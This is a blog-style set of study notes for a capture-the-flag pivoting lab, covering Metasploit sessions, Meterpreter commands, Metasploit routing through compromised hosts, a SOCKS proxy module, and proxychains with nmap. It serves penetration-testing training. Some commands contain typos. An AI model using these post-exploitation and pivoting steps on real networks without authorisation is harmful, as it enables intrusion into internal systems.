Post 09 - PIVOT!

09 Dec 2022

Task 14, Day 09, Pivoting Dock the halls

Common way to tell if a compromised application is running in a docker container is checking if root dir has /.dockerenv.

Metasploit

Common console commands for viewing and manipulating sessions:

• sessions - view sessions
• sessions -u -1 - upgrade last opened session to Meterpreter
• sessions -i session_id - interact with a session
• background - background current interactive session and return to Metasploit prompt

Meterpreter

Meterpreter is an advanced payload that provides interactive access to a compromised system. Commands include:

• sysinfo - get info about remote system, i.e. OS
• upload local_file.txt - upload a file or directory
• ipconfig - display interfaces
• resolve remote_service1 remote_service2 - resolve set of host names on the target to IP addresses. useful for pivoting

Using Metasploit and Meterpreter

Metasploit Framework - msfconsole to start Metaploit.

• search module_name_part - search for module
• use module_name - load module
• info - after using module will show info about module including options, description, CVE details, etc.
• show options - show available options
• set rhost MACHINE_IP - set target host IP
• set verbose true - turn on logging
• set lhost LISTEN_IP - set payload listening address; IP address of host running Metasploit
• check - check module
• run - run module

Can also set options in run command, i.e. for postgres_sql module: run postgres://user:password@MACHINE_IP /datbase_name sql='select version()'

Metasploit has an internal routing table modified with route, determines where to send traffic, allows pivoting. Meterpreter has separate route command that isn’t the same. Need to background current Meterpreter to adjust Metasploit route. Syntax: route [add/remove] subnet netmask [comm/sid]

• route add 172.17.0.1/32 -1 - send packets destined for 172.17.0.1 to the latest opened session
• route add 172.10.48/29 -1 - send packets destined for 172.28.101.48/29 subnet to the latest opened session
• route print - output routing table

Socks Proxy

intermediate server that supports relaying network traffic between two machines. Can run socks proxy locally on pentester’s machine via Metasploit or directly on compromised server. use auxiliary/server/socks_proxy run srvhost=127.0.0.1 srvport-9050 version=4a

Tools like curl support sending requests through a socks proxy via the --proxy flag curl --proxy socks4a://localhost:9050 http://MACHINE_IP

If tool doesn’t natively support, ProxyChains canintercept request and route through proxy. i.e. with Nmap: proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 MACHINE_IP,

The Task

Get info to find potential vulns, and prove level of security.